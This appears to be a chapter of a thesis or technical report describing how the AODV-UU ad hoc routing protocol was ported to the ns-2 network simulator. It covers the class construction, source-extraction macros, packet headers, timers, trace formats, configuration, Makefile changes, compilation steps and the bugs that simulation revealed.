Some future work remains to be done on the AODV-UU routing agent.
The issues listed below have not been (fully) addressed, due to time constraints.

Support for local repair should be added as soon as this feature becomes available for the AODV-UU routing daemon.

The tagged trace format should be supported. Although this format is new and relatively uncommon, its importance may increase in the future.

Support for using the AODV-UU routing agent in wired and wired-cum-wireless scenarios should be investigated. The primary mission so far has only been to use AODV-UU as an ad-hoc routing agent for wireless mobile nodes.

The portability of AODV-UU should be extended so that it can be run on other platforms than Linux, e.g. Sun Solaris. This is an important step to increase its usage in the research community.

Possibly, the configuration parameters of the AODV-UU routing agent should be checked during runtime, e.g. by introducing a special configuration command and enforcing its usage. This would prevent users from supplying incorrect parameters to the routing agent.

Summary

The porting of AODV-UU to run in the ns-2 network simulator was successfully accomplished. By using the preprocessor and macros for source code extraction, an AODV-UU routing agent was constructed that uses the same source code as the conventional Linux version, with only minor differences in packet handling. This approach also allows for easy switching between compilation of the ported version and the conventional version. The separate compilation of software modules in AODV-UU was preserved by letting the AODV-UU Makefile compile these modules, given certain compilation parameters from the ns-2 Makefile. Finally, the AODV-UU routing agent was integrated into ns-2 by packaging it as a library, which is included during linking. During initial testing in the simulator, bugs were found that probably would not have been possible to find in real-world experiments with AODV-UU. This confirms that simulations and real-world experiments complement each other in more than one way. Further testing of the AODV-UU routing agent can be found in Chapter 7.

Chapter 7
Testing the Functionality of AODV-UU in ns-2

7.1 Introduction

After porting AODV-UU to run in the ns-2 network simulator, its functionality had to be verified. To do this, several test-runs were performed using different scenarios supplied with ns-2 version 2.1b9 as well as standalone scenarios, and the results were compared to the expected results specified by the documentation for each scenario. Documentation for those scenarios that are part of the ns-2 distribution can be found in [56], and the source code of all scenarios and supplemental scripts mentioned in this chapter is available from [55]. The notation ns followed by a path and a filename refers to the corresponding file in the ns-2 source code tree; the complete source code of ns-2 is available from the ns-2 homepage [8].

7.2 General setup

The scenarios were modified to use the AODV-UU routing agent by changing the routing protocol setting to AODVUU, and the simulation scenario script files were named or re-named to indicate this. AODV-UU version 0.5 was compiled with the option to use HELLO messages. The default run-time configuration options for AODV-UU were used, except for logging which was also enabled.
If not otherwise stated, the scenarios use de facto wireless settings, i.e., a WirelessChannel wireless channel, a WirelessPhy wireless network interface with 2 Mbps bandwidth, the two-ray ground reflection radio propagation model, the 802_11 MAC layer (using 2 Mbps as the data rate both for unicast and broadcast packets), a PriQueue priority queue of length 50 as an interface queue, and an omni-directional antenna. All these components come with certain default settings, which can be found in ns/tcl/lib/ns-default.tcl.

7.3 simple-wireless-aodv-uu.tcl

Scenario overview
In simple-wireless-aodv-uu.tcl, communication between two mobile nodes is tested by moving them relative to each other so that one node is not always within radio range of the other one. This scenario is based on ns/tcl/ex/simple-wireless.tcl.

Scenario setup
The scenario sets up a 500 x 500 m flat grid and places two mobile nodes out of each other's radio range. One node has a TCP sink agent attached to it, which will receive (and throw away) any incoming TCP traffic. The other node has an FTP agent connected to its TCP agent, simulating FTP traffic. The nodes are connected to each other through the wireless channel.

Scenario description and results
The FTP traffic is started at time 10 seconds. However, at this time the nodes are too far apart for any communication to take place. At time 50 seconds, the node with the TCP sink starts moving towards the FTP source node, and at time 68 seconds, the nodes are close enough to begin exchanging routing control messages. It has been verified that the routing tables of the two nodes are set up correctly, by using the routing table logging option of AODV-UU and analyzing the routing table logfiles. At time 100 seconds, the TCP traffic starts to flow, and the TCP sink starts moving away from the FTP source node. This causes the link between them to break at time 116 seconds, and subsequent packets are dropped. The link failure is reflected in the nodes' routing tables at time 119 seconds, and the simulation ends at time 150 seconds.

Conclusions
Analysis of the trace log from the simulator as well as the AODV-UU logfiles shows that the scenario works as expected using AODV-UU. The events in the trace log correspond to those of the scenario documentation.

7.4 wireless1-aodv-uu.tcl

Scenario overview
In wireless1-aodv-uu.tcl, three nodes are placed in such a way that two of the nodes need to route their traffic through an intermediate node to reach each other. This scenario is based on ns/ns-tutorial/wireless1.tcl.

Scenario setup
The movement and traffic patterns are loaded from separate files, scen-3-test and cbr-3-test, which are part of the ns-2 distribution. The movement pattern file covers random-waypoint movements over an area of 670 x 670 m, and the traffic pattern file sets up connections between the three nodes during the duration of the simulation (400 seconds). The layout of the scenario is visualized by NAM (Network Animator) in Figure 7.1.

Results and conclusions
By analyzing the AODV-UU routing table logfiles, it was concluded that the two outermost nodes always use the intermediate node to send traffic to each other, and that the intermediate node is the only node ever within radio range of both the other nodes simultaneously.

7.5 The Roaming Node scenario
In order to validate the functionality of AODV-UU in ns-2 further, a scenario called "Roaming Node" was adopted.
This scenario was originally used for real-world experiments concerning the "Gray Zone Problem" [58], when using HELLO messages as periodic node announcements with AODV-UU together with wireless communication based on IEEE 802.11b. Briefly, the Gray Zone Problem refers to the fact that HELLO messages, being sent as broadcast packets, may reach a node although it is impossible for data packets to get through (the latter being sent as unicast packets at a higher bit rate). This causes nodes in such gray zones to falsely believe that they have proper connectivity to some of their neighboring nodes, resulting in packet loss when attempts are made to send data packets. The reasons for choosing this specific scenario to test the functionality of AODV-UU in ns-2 were the following:

Figure 7.1: Layout of the wireless1-aodv-uu.tcl scenario. All network traffic in this scenario has to pass through an intermediate node.

The real-world results of the scenario have been carefully documented in [58]. This includes diagrams and detailed descriptions of real-world results using AODV-UU. The scenario is small enough to easily be understood, yet complicated enough to test multi-hop routing and to observe the behavior of the routing agent when link failures occur. It is a good starting point for evaluating if simulation results correspond well to real-world results, and for getting to know which problems may arise when transferring a real-world scenario into one in the simulator.

Scenario overview
The Roaming Node scenario consists of four nodes (denoted GW, C1, C2 and MN), of which three are stationary (GW, C1 and C2) and the fourth one (MN) is a mobile node, "roaming" the environment while sending Ping packets to GW. The GW node sends a Ping reply back to the mobile node for each Ping packet it receives. The nodes are placed in such a way that each stationary node is within radio range of only its nearest neighbor(s). This will force both the mobile node and the GW node to send their Ping packets through another stationary node in order to reach each other during some parts of the scenario. The layout of the Roaming Node scenario is shown in Figure .

Scenario setup
Measurements were taken from the real-world environment where the Roaming Node scenario originally took place, and were transferred into coordinates in the simulation scenario script file, roaming-aodv-uu.tcl. Since the flat grid topography in ns-2 uses metres as its unit of measurement, this was easily done. To model the wireless communication of the Roaming Node scenario more correctly in the simulator, some changes had to be made to the default values of the wireless physical layer. Radio characteristics of the wireless network cards used in the real-world experiments (ORiNOCO 802.11b PC Cards) were taken from [59], and the affected values were set in the simulation scenario script file. Most importantly, the receive threshold for all nodes in the scenario was set to a value corresponding to a radio range of 22.5 m. This is roughly enough for the
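As a rough illustration of what such a threshold setting involves, the sketch below derives a receive-power threshold for a given range from the Friis and two-ray ground models that ns-2 uses. It is not taken from the thesis; the transmit power, frequency and antenna parameters are assumed defaults used purely for illustration.

import math

def receive_threshold(distance_m, pt_w=0.28183815, freq_hz=914e6,
                      gt=1.0, gr=1.0, ht=1.5, hr=1.5, sys_loss=1.0):
    # Received power at distance_m; setting the node's RXThresh_ to this
    # value makes distance_m the effective radio range.
    lam = 3e8 / freq_hz                      # wavelength in metres
    crossover = 4 * math.pi * ht * hr / lam  # two-ray crossover distance
    if distance_m < crossover:
        # Friis free-space model below the crossover distance
        return pt_w * gt * gr * lam ** 2 / ((4 * math.pi * distance_m) ** 2 * sys_loss)
    # Two-ray ground reflection model beyond the crossover distance
    return pt_w * gt * gr * ht ** 2 * hr ** 2 / (distance_m ** 4 * sys_loss)

print(receive_threshold(22.5))  # threshold corresponding to a 22.5 m range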
http://docplayer.net/42034480-Porting-aodv-uu-implementation-to-ns-2-and-enabling-trace-based-simulation.html
CC-MAIN-2018-43
refinedweb
37,449
51.58
Chapter 3. Known issues This section lists known issues with Red Hat CodeReady Workspaces 2.6. Where available, workaround suggestions are provided. 3.1. CodeReady Workspaces cannot be installed with default settings in the proxied environment using OperatorHub on OpenShift Container Platform 4.6 During an installation on OpenShift Container Platform 4.6 using OperatorHub, the CodeReady Workspaces Pod fails to deploy with the following error message: Error in custom provider, java.lang.RuntimeException: Exception while retrieving OpenId configuration from endpoint: To work around this issue, add the .svc value to the nonProxyHosts property of the CheCluster Custom Resource. See Preparing CodeReady Workspaces Custom Resource for installing behind a proxy. 3.2. Temporary factory authentication flow for Bitbucket with required manual configuration CodeReady Workspaces provides the ability to use factories with Bitbucket repositories. The current factory authentication flow requires manual configuration of the user’s project credentials by the user or an administrator. For more information, see Configuring Bitbucket servers and Deploying CodeReady Workspaces with support for Git repositories with self-signed certificates. 3.3. Upgrade to CodeReady Workspaces version 2.6 using crwctl fails on OpenShift Container Platform 3.11 The crwctl server:update command fails if executed from a folder where another templates directory exists. Ensure there is no templates subdirectory, with content not related to crwctl, in the directory from which the crwctl server:update command is executed. 3.4. Signing in to GitHub from a CodeReady Workspaces workspace using the GitHub plug-in fails When this issue occurs, connect a GitHub account using the CodeReady Workspaces user dashboard to sign into the GitHub repository. Make sure that GitHub OAuth is set. Then follow one of the described possibilities about how to add a GitHub account to CodeReady Workspaces. From the Workspace tab of the main dashboard screen: - Navigate to the Project sub-tab. - Click the button. - From the GitHub tab, use the button. From the left bottom menu of the main dashboard screen: - Click Account and continue with the button, which will forward you to the Red Hat Single Sign-On main screen. - From the left menu, select the Federated identity tab. - Add the GitHub account using the button. - CRW-1563 3.5. A workspace IDE is not loading when the workspace PVC is used to its maximum limit The keycloak.js JavaScript file cannot be loaded when the Persistent Volume Claims (PVCs) of a workspace operate at their maximum limit. As a consequence, the IDE cannot start properly with the workspace. This issue occurs in CodeReady Workspaces workspaces with a disabled OpenShift OAuth service combined with the Common PVC strategy. 3.6. Some workspace plug-ins do not load behind a proxy To work around this issue: 3.7. Workspaces on OpenShift Container Platform 4.6 fail to start when cluster-wide proxy settings are applied Workspaces with the useInternalClusterSVCNames environment variable set to true fail on OpenShift Container Platform 4.6 clusters with wide proxy settings applied. To work around this issue: 3.8. Logging in to a CodeReady Workspaces workspace using the crwctl tool fails with OpenShift OAuth support enabled. The crwctl auth:login utility fails to log in to CodeReady Workspaces with OAuth support. To work around this issue: 3.9.
Breakpoints of the debug session do not work correctly in a Quarkus workspace A breakpoint is currently triggered only if it is set during the current debug session. 3.10. Debug configuration is not displayed in the Debug view A problem related to file watchers infrequently occurs, making it impossible to start a debug session because of the missing debug configuration in the Debug view. To work around this issue, open the /projects/.theia/launch.json file and use the configuration file, which will now be present in the Debug view. 3.11. Missing preinstalled language server tools for GO workspaces The absence of additional tools causes a feature, such as Auto-complete, to fail in a workspace created using the default GO devfile. To work around this issue in a non-restricted environment installation, install the required module using the button of the pop-up window in the IDE. 3.12. Rare workspace startup failures Infrequently, CodeReady Workspaces workspaces fail at the start when multiple workspaces are started in a cluster simultaneously. The issue affects less than 1% of all workspaces started. 3.13. The Topology view does not respect the CodeReady Workspaces icon on OpenShift Container Platform 4.6 After creating an application in the Developer console of OpenShift Container Platform 4.6, the Edit source icon in the Topology view displays as the Eclipse Che logo. 3.14. The Install dependencies command fails in the PHP-DI workspace on OpenShift Container Platform 4.6 The Install dependencies (with composer) command, predefined in the php-di/console.php file, fails in a workspace created using the PHP-DI default yaml. 3.15. Inability to request a JSON response from OpenShift client Attempts to obtain a JSON response from the OpenShift client fail and are accompanied by a warning message in the Red Hat Single Sign-On Pod. WARN [org.jgroups.protocols.kubernetes.KUBE_PING] (thread-138,ejb,ycloak-598b6c57b4-khhfb) failed getting JSON response from Kubernetes Client[masterUrl= , headers={Authorization=#MASKED:883#}, connectTimeout=5000, readTimeout=30000, operationAttempts=3, operationSleep=1000, streamProvider=org.jgroups.protocols.kubernetes.stream.TokenStreamProvider@792525a5] for cluster [ejb], namespace [default], labels [null]; encountered [java.lang.Exception: 3 attempt(s) with a 1000ms sleep to execute [OpenStream] failed. Last failure was [java.io.IOException: Server returned HTTP response code: 403 for URL: ]] 3.16. Inability to edit a Red Hat Single Sign-On user account After logging in to Red Hat Single Sign-On, a user is not able to edit an account profile using the Manage account tab. 3.17. Inability to install CodeReady Workspaces on OpenShift Container Platform 3.11 without cluster-admin role A customer in an organization with a strict security policy cannot install CodeReady Workspaces v2.1.1 on an OCP 3.11 cluster with the crwctl utility, which requires a user with cluster-admin privileges. 3.18. Proxy settings block access to dependencies of building tools in restricted environments For instances of CodeReady Workspaces deployed in restricted environments, the proxy blocks access to downloadable dependencies for building tools such as Maven, Gradle, and others. To work around this issue, configure the proxy settings to allow the specific builder to reach the needed dependencies. 3.19. Partially-deployed CRW Operator crashes if the CheCluster custom resource is deleted A partially-deployed codeready-operator, installed from the OperatorHub, crashes after deleting a CheCluster CR.
(runtime error: invalid memory address or nil pointer dereference) 3.20. Wrong default value for a Quarkus project default folder Instead of suggesting /projects/ as the default target folder of the Quarkus sample project, the Create Quarkus project button of the Quarkus wizard suggests the root folder (/), which is not visible from the IDE. To work around this issue, reject the suggested destination and use /projects. 3.21. CodeReady Workspaces 2.5 Red Hat Fuse workspaces fail to start after migration to 2.6 CodeReady Workspaces 2.5 Red Hat Fuse workspaces deployed on OpenShift with enabled OpenShift OAuth support fail to start after updating to 2.6. 3.22. Manually added registries using Theia Plugin View are not reflected in the View automatically To work around this issue, refresh the page by pressing F5, or Cmd+R if using macOS. 3.23. Some run and build commands of the Getting started examples may fail in AirGap installations Some of the sample projects included in the Getting started section are not designed for offline or airgapped use, so some commands may not work. To resolve this, users may have to talk to an organization’s administrator to get access to internal mirrors, such as NPM, Maven, and PIP. The base functions of the Getting started ZIP-archived samples embedded in the offline devfile registry do not work. Commands that require internet access to run: Run, Simple build, Outline 3.24. Deleting a CheCluster custom resource causes CodeReady Workspaces Operator errors Uninstalling CodeReady Workspaces manually by deleting the checluster custom resource in the OperatorHub causes errors in the CodeReady Workspaces Operator. As a consequence, attempting to re-install CodeReady Workspaces in OperatorHub fails. 3.25. CodeReady Workspaces deployed without TLS support causes some features to not work properly In CodeReady Workspaces 2.1 and later, secure HTTPS is required to use the most recent Theia IDE, and therefore TLS mode is enabled by default. Disabling TLS support will cause the user experience to suffer and some UI will not work as expected or at all. For example, the welcome page may be blank or broken, images may be missing, and other functionality may not work properly.
https://access.redhat.com/documentation/en-us/red_hat_codeready_workspaces/2.6/html/release_notes_and_known_issues/known-issues
CC-MAIN-2021-21
refinedweb
1,460
54.52
Have you tried to use LINQ to query a database using Visual Studio? It can be a frustrating experience of things that compile but fail at runtime, and that edit / compile / test cycle can quickly lead to hours of lost time trying to get a single complex query to work correctly. LINQPad is sort of like Notepad: you can write and edit .linq files using it. But that is where the Notepad similarity stops. You can execute your LINQ queries and see the results without having to run your application. It is truly something you have to watch in order to believe how much more productive it can make your writing of LINQ. When I was first working on the VistaDB product store and account manager, writing LINQ queries against my Entity Framework objects was incredibly frustrating. Most of the documentation and samples I found were for Linq2Sql, which has similar syntax… but not the same. And worse, most of the syntax compiles fine, but blows up at runtime with cryptic error messages. My typical dev and test cycle was around 5 minutes to compile the DAL / Site, login to the account, navigate to the correct page, and visit the yellow screen of death from asp.net. It was not fun, so I started working in a standalone tester app I built just for this purpose. Write the query, compile, debug, step, step, read exception and try to decipher it. I was reading a post on Stack Overflow about one of those cryptic errors when someone suggested to the poster they use LINQPad to test their queries first before putting them into their apps. Wow, what a great idea! Where was this tool? (You can download it for free from Linqpad.net ) LINQPad allows you to execute single LINQ commands against an existing EF model, or even to write dot net code in the editor and execute it like a little dynamic dot net environment. The main application is free, but there is an auto-complete feature in the editor that you must pay for in order to activate. Believe me, it is worth it to pay for the license; you also support the author and show him the application is worth money. The license is very inexpensive and well worth the price in order to get IntelliSense-like behavior on your LINQ queries. The first couple versions I played with worked great with SQL Server, but could not load the VistaDB EF provider. I was bummed, but at least I could debug my queries against SQL Server, and then run against VistaDB to make sure it worked the same way. But I recently got an email from the author of LINQPad that it could load VistaDB, in version 2. So now I can use it with VistaDB 4 and test my LINQ queries the same way I do the SQL Server queries. The steps are a little difficult the first time you do them, but nothing that should scare off someone taking up LINQ (it is pretty scary all by itself). Ok, first things first. You have to get LINQPad to be able to load your VistaDB developer license. Since it obviously wasn’t compiled with VistaDB in mind, you need to use the app.config approach. In this case you create a LINQPad.config file in the same directory as the executable. NOTE: This is NOT the linqpad.exe.config that comes with the beta download. It must be named LINQPad.config in the same directory as the EXE.
<configuration>
  <appSettings>
    <add key="VistaDBUseDesignTimeLicense" value="true"/>
  </appSettings>
</configuration>
This will tell the engine to allow LINQPad to use your design time license. All that means is you must have a valid developer license on the machine where you are running LINQPad. You can build your EF model in an EXE or DLL assembly, but the model namespace must be public. It is going to be reflection loaded by LINQPad, so it has to be able to reach it. I built the project as a .Net 3.5 Console Application and then added an Entity Framework model to our VistaDB Site database. I don’t normally recommend a complete database as a single Model, but this was just for a demonstration. Now build the application so you have an output of the DLL or EXE. You will need this to point LINQPad to in order to load your model. Within LINQPad there is an area on the left that represents all your current connections to databases. This is sort of like the Server Explorer in Visual Studio. The top entry is an Add Connection link, click that to see the Choose Data Context dialog. Choose the Entity Framework from a typed data context in your own assembly. This will be the application we just built above. Select Next and a LINQPad connection dialog appears. Choose the BROWSE link on the Path to Custom Assembly textbox. Browse to your assembly and choose the dll or exe, a Choose Custom Type dialog will appear asking you to identify which models you want to use from that assembly. After choosing the assembly the connection dialog will look something like this image below. It is not correct yet, but if you take a moment and copy the Server field it includes the actual filename you need in the next step. Under the PROVIDER group box choose the OTHER checkbox and the dialog will change. Choose the System.Data.VistaDB provider name from the dropdown, and then enter a valid connection string. I recommend you just use the Data Source= and the name of the file from the previous step. You can’t use macros like DataDirectory because the working path of LINQPad is not your application. You need to provide an absolute path. If you don’t remember the VistaDB connection string options visit the website. The Remember this connection means that LINQPad will reload that connection at next startup. The TEST button should load and return a success to your database. If it fails with file not found then you probably have the wrong path to the database, or an error in your connection string. Now the complete model is visible in the connection area of LINQPad, and you are ready to start writing LINQ queries against VistaDB. The complete model is shown, and you can navigate down through the entities to look at their properties. Now you can write a query against the EF model and get answers by running them directly within LINQPad. In this case I am selecting all the shipping products and ordering them by the productid. See the RESULTS selected under that query? You can select the Lambda symbol and see what the query looks like as a Lambda.
Notice the Lambda syntax looks quite a bit different. I personally really like this ability to have LINQPad show me another way of doing the same query. Sometimes one syntax or another is much clearer to me on what is happening. I took the Lambda version and executed it to get the same results. The SQL option doesn’t work for anything other than Linq2Sql entities, because Entity Framework doesn’t give you a nice way to get the SQL out of an execution. Hopefully this post will get you off to learn more LINQ using VistaDB (or any other third party EF provider actually). LINQ is one of those technologies that has a huge learning curve to it, but the rewards are pretty spectacular once you have a basic grasp of the syntax. You can do things much more expressively in LINQ than you can using SQL. The ability to query your objects within your native programming language is a big change in how programmers access and manipulate data. I find that I enjoy writing LINQ queries in LINQPad due to the instant feedback of running the queries. There are a LOT of powerful options in LINQPad that I have not even touched on here. Maybe another post with more details about the power of LINQPad would be in order. What do.
http://www.codeproject.com/script/Articles/View.aspx?aid=310670
CC-MAIN-2014-23
refinedweb
1,423
71.65
XQuery, the Server LanguageXQuery, the Server Language. For instance, we can create the traditional "Hello, World!" application as a web service, as shown in Listing 1 (hello_world.xq). let $user := request:get-parameter("user","World") let $message := if ($<input type="submit" value="Go!"/></p> else <p>Hi, {$user}! Welcome to the Hello, World Example!</p> let $page := <html> <head> <title>Hello, {$user}!</title> </head> <body> <h1>Hello, {$user}!</h1> <form method="get" action="hello_world.xq"> {$message} </form> </body> </html> return $page Listing 1: Hello, World, rendered in eXist's XQuery language The eXist engine runs this XQuery as a REST based service, invocable from the command line. For instance, the document above might be given as. where this particular file is actually stored within the database itself. The (: :) characters serve as comment delimiters The let keyword indicates the declaration and definition of a variable, with assignment being made explicitly using the := notation (with the bare equal sign serving to act as a Boolean comparison operator). Where things get a little strange is in the notion of containment. A single XML node (with or without children) also carries with it its own sense of "blockness," so that expressions such as if/then/else require either static values (such as numbers or strings), single XML elements (with or without children) or sequences of nodes and values delimited by parentheses. Thus, in the $message declaration, both the then and the else clauses return single elements. The bracket notation within elements and attributes serves the same purpose as bracket notation within XSLT: it evaluates the XPath expressions and returns the results in the appropriate context, though unlike XSLT bracketed expressions can return elements or attributes, not just strings (meaning that you have to be more careful when writing bracketed XQuery that you're not attempting to test a string vs. an element or attribute inadvertently. This can be seen in the insertion of the $message element within the larger XHTML template. XQuery makes use of what has become known as FLWOR (flower) notation, where the term is an acronym for the five primary keywords of XQuery notation: For, Let, Where, Order by and Return. Typically all XQuery statements have at a minimum at least one for or let expression, and then has a final return statement indicating what gets passed back out of the overall filter. Similarly, assignment statements can contain secondary for/let/if/then/else expressions, with the return keyword indicating the returned value or expression to be passed back to the assigned variable. Thus, in Listing 1, the line: return $ page at the very end of the XQuery returns the element defined in the variable $page. In an open query like the one above, this final return is used by eXist to pass the information to the servlet's output, in essence writing the buffers and sending the contents to the client. I've deliberately held off discussing the first line of listing 1. The expression let $user := request:get-parameter("user","World") assigns to the variable user the results of the get-parameter() function in the request namespace. Put another way, this looks at either the incoming query string (if the HTML form in question used the GET method) or the post name/value data (if the method was POST) for the parameter user. If the parameter exists, then use it, otherwise, use the parameter value "World". This call is a staple of just about any server language. 
The ability to pull parameters from user input was one of the first reasons for building server-side scripting languages, but this is an eXist feature, not an XQuery one. However, the benefits of this particular feature should be obvious: if you can access information from the client, modify your outgoing streams (something that can be accomplished with the corresponding response: namespace) and maintain session and authentication information, then you have all of the functions necessary for a server language. One of the more important features of XPath 2, upon which XQuery is based, comes from the realization that extensions are inevitable. There will always be things that fall beyond the immediate scope of the language but that are important to you as the developer. For this reason, XPath 2 (and hence XQuery) includes very clear conventions for defining additional functionality to the language...a fact which implies that other XML database vendors may very well want to look at this functionality and see whether it enhances their own products. The eXist database defines a number of these namespaces out of the box. From the standpoint of servlet development, perhaps the most important namespaces are as follows: request: provides access to information sent from the client. Functions include get-cookie-names, get-cookie-value, get-data, get-header, get-header-names, get-method, get-parameter, get-parameter-names, get-server-name, get-uploaded-file, get-uploaded-file-name, and get-url. response: lets the developer control the stream of data being sent back to the client. Functions include redirect-to, set-cookie, set-header, and stream-binary. session: provides control over the user's HTTP sesssion. Functions include create, encode-url, get-attribute, get-attribute-names, get-id, invalidate, set-attribute, and set-current-user. transform: lets the developer transform an XML node using XSLT from within the xquery. Functions include transform and stream-transform. update: The update commands (distinct from a namespace) let you perform live updates of the data in the eXist XML database, either at the granular level of changing a value in the database or at the level of inserting or removing whole documents. This addresses one of the big shortcomings of XQuery, in that it provides for an effective read-write solution that can be invoked from within an XQuery. Other extensions can be compiled in by rebuilding the Java JAR (a shell or batch script automates this process) for doing such things as writing SQL queries and updates designed to work with any JDBC compliant SQL database, such as Oracle, mySQL, Postgres, or SQL Server. This capability is especially important because it provides a bridge between the SQL and XML worlds, letting you perform complex queries (or updates) on your SQL database then passing this information to the XQuery to be additionally processed, filtered, sorted, or transformed. Additionally, other extensions give access to a full range of math functions (including the oh-so-useful math:random function), let you send mail through an SMTP server, retrieve (and to a certain extent modify) images (which can also be stored in the database, by the way), and other functions that provide functionality more associated with a full bore server-side scripting language than an XML query language.. XML.com Copyright © 1998-2006 O'Reilly Media, Inc.
http://www.xml.com/lpt/a/1704
crawl-002
refinedweb
1,128
50.16
ViewModel in ASP.NET Core MVC Application In this article, I am going to discuss ViewModel in ASP.NET Core MVC application with an example. Please read our previous article before proceeding to this article where we discussed Strongly Typed View in ASP.NET Core MVC application. As part of this article, we are going to discuss the following pointers. - What is a View Model in ASP.NET Core? - Why do we need the View Model? - How to implement the View Model in ASP.NET Core Application? What is a ViewModel in ASP.NET Core MVC? In real-time applications, a single model object may not contain all the data required for a view. In such situations, we need to use a ViewModel in the ASP.NET Core MVC application. So in simple words, we can say that a ViewModel in ASP.NET Core MVC is a model that contains the data of more than one model required for a particular view. Combining multiple model objects into a single view model object provides us better optimization. Understanding the ViewModel in ASP.NET Core MVC: The following diagram shows the visual representation of a view model in the ASP.NET Core MVC application. Let's say we want to display the student details in a view. We have two different models to represent the student data. The Student Model is used to represent the student basic details whereas the Address model is used to represent the address of the student. Along with the above two models, we also require some static information like page header and page title in the view. If this is our requirement then we need to create a view model, let's say StudentDetailsViewModel, and that view model will contain both the models (Student and Address) as well as properties to store the page title and page header. Creating the Required Models: First, create a class file with the name Student.cs within the Models folder of your application. This is the model that is going to represent the basic information of a student such as name, branch, section, etc. namespace FirstCoreMVCApplication.Models { public class Student { public int StudentId { get; set; } public string Name { get; set; } public string Branch { get; set; } public string Section { get; set; } public string Gender { get; set; } } } Next, we need to create the Address model which is going to represent the Student Address such as City, State, Country, etc. So, create a class file with the name Address.cs within the Models folder and then copy and paste the following code in it. namespace FirstCoreMVCApplication.Models { public class Address { public int StudentId { get; set; } public string City { get; set; } public string State { get; set; } public string Country { get; set; } public string Pin { get; set; } } }
using FirstCoreMVCApplication.Models; namespace FirstCoreMVCApplication.ViewModels { public class StudentDetailsViewModel { public Student Student { get; set; } public Address Address { get; set; } public string Title { get; set; } public string Header { get; set; } } } We named the ViewModel class as StudentDetailsViewModel. Here the word Student represents the Controller name, the word Details represent the action method name within the Student Controller. As it is a view model so we prefixed the word ViewModel. Although it is not mandatory to follow this naming convention, I personally prefer it to follow this naming convention to organize view models. Creating Student Controller: Right-click on the Controllers folder and then add a new class file with the name StudentController.cs and then copy and paste the following code in it. using FirstCoreMVCApplication.Models; using FirstCoreMVCApplication.ViewModels; using Microsoft.AspNetCore.Mvc; namespace FirstCoreMVCApplication.Controllers { public class StudentController : Controller { public ViewResult Details() { //Student Basic Details Student student = new Student() { StudentId = 101, Name = "Dillip", Branch = "CSE", Section = "A", Gender = "Male" }; //Student Address Address address = new Address() { StudentId = 101, City = "Mumbai", State = "Maharashtra", Country = "India", Pin = "400097" }; //Creating the View model StudentDetailsViewModel studentDetailsViewModel = new StudentDetailsViewModel() { Student = student, Address = address, Title = "Student Details Page", Header = "Student Details", }; //Pass the studentDetailsViewModel to the view return View(studentDetailsViewModel); } } } As you can see, now we are passing the view model as a parameter to the view. This is the view model that contains all the data required by the Details view. As you can notice, now we are not using any ViewData or ViewBag to pass the Page Title and Header to the view instead they are also part of the ViewModel which makes it a strongly typed view. Creating the Details View: First, add a folder with the name Student within the Views folder your project. Once you add the Student Folder, then you need to add a razor view file with the name Details.cshtml within the Student folder. Once you add the Details.cshtml view then copy and paste the following code in it. @model FirstCoreMVCApplication.ViewModels.StudentDetailsViewModel <html xmlns=" <head> <title>@Model.Title</title> </head> <body> <h1>@Model.Header</h1> <div> StudentId : @Model.Student.StudentId </div> <div> Name : @Model.Student.Name </div> <div> Branch : @Model.Student.Branch </div> <div> Section : @Model.Student.Section </div> <div> Gender : @Model.Student.Gender </div> <h1>Student Address</h1> <div> City : @Model.Address.City </div> <div> State : @Model.Address.State </div> <div> Country : @Model.Address.Country </div> <div> Pin : @Model.Address.Pin </div> </body> </html> Now, the Details view has access to the StudentDetailsViewModel object that we passed from the controller action method using the View() extension method. By using the @model directive, we set StudentDetailsViewModel as the Model for the Details view. Then we access Student, Address, Title, and Header using @Model property. Now run the application, and navigate to the “/Student/Details” URL and you will see the output as expected on the webpage as shown in the below image. In the next article, I am going to discuss the Routing in ASP.NET Core MVC application with an example. 
Here, in this article, I try to explain the ViewModel in ASP.NET Core MVC application with an example. I hope you understood the need and use of ViewModel in ASP.NET Core MVC Application. 3 thoughts on “ViewModel in ASP.NET Core MVC” No need for these two lines in the StudentController code: ViewBag.Title = “Student Details Page”; ViewBag.Header = “Student Details”; As Ahmed has already pointed above, setting the values for ViewBag.Title and ViewBag.Header is not required as we are using strongly typed model. They are not being used anyway. Further, can you please write a guide on using a ViewModel for a form and submitting it back to the controller? Thanks. Yes. There is no need. Thanks for identifying the issue. We have corrected this.
https://dotnettutorials.net/lesson/view-model-asp-net-core-mvc/
CC-MAIN-2022-21
refinedweb
1,204
58.79
Readers of my earlier installments on RELAX NG (Part 1 and Part 2).: When converted to XML syntax, use of this declaration appends an "ns" attribute to the root element of the schema. If this namespace is not explicitly specified, the default default namespace is used, and is declared with the root attribute, such as: You may also declare an external namespace for elements or attributes: This allows you to describe elements like: When converted to XML syntax, the namespace URL is added to the root tag as an extra attribute: The namespace "a" is a bit special here. RELAX NG allows annotations, which are basically just tags with the "a" namespace. In compact syntax, you can avoid thinking about namespaces by adding an annotation with initial double hash marks: Converted to XML syntax, this annotation appears as: By the way, a single leading hash introduces a comment instead of an annotation, so the following compact syntax form: corresponds to this XML form: You can also use a slightly odd compact syntax form to specify other annotations within the "a" namespace: A root attribute "xmlns:a" will be specified automatically in the XML syntax if annotations are used, but since "a" is just another namespace, you can specify your own URL if you want. The default attribute is equivalent to specifying: One more special namespace is specified differently in both syntax forms. Data types rely on a modular specification, usually using W3C XML Schema data types. You may specify these with compact syntax: or XML syntax:: Listing 1. A nested compact syntax schema: Listing 2. Using groups for quantification In this case, a valid document's root <foo> element might contain several <bar></bar><baz></baz> sequences prior to one final <bam> element. There is no way to express the same concept by only quantifying the individual "bar" and "baz" elements.: Listing 3. A context-free compact syntax schema: Listing 4. A context-free XML syntax schema.. - Participate in the discussion forum. - Download the xvif library. For a somewhat more polished tool, 4Suite incorporates xvif for RELAX NG validation. The command-line tool 4xml will validate against both RELAX NG and DTDs, with various options. 4Suite includes many other tools and libraries for working with many XML-related technologies. - trang and jing are complementary tools for transformation between schemata, and validation against RELAX NG schemas. The former depends on the latter but both can be downloaded in a convenient archive here. - You will need to obtain an implementation of the Java API for XML Processing (JAXP) to use trang. If you run a Java 1.4 JVM, you are fine; otherwise, download crimson here. - DTDinst is a Java tool to for converting. - Find a collection of documents and tools presented in this series of articles here. - Read David Mertz's roundup of XML editors: Part 1 examines Java and MacOS applications(including <oXygen/>), while Part 2 looks at Windows-based products.. David Mertz thinks that the schema that is real is not the real schema. David may be reached at mertz@gnosis.cx; his life pored over at. Suggestions and recommendations on this, past, or future, columns are welcomed.
http://www.ibm.com/developerworks/xml/library/x-matters27/index.html
crawl-003
refinedweb
529
54.12
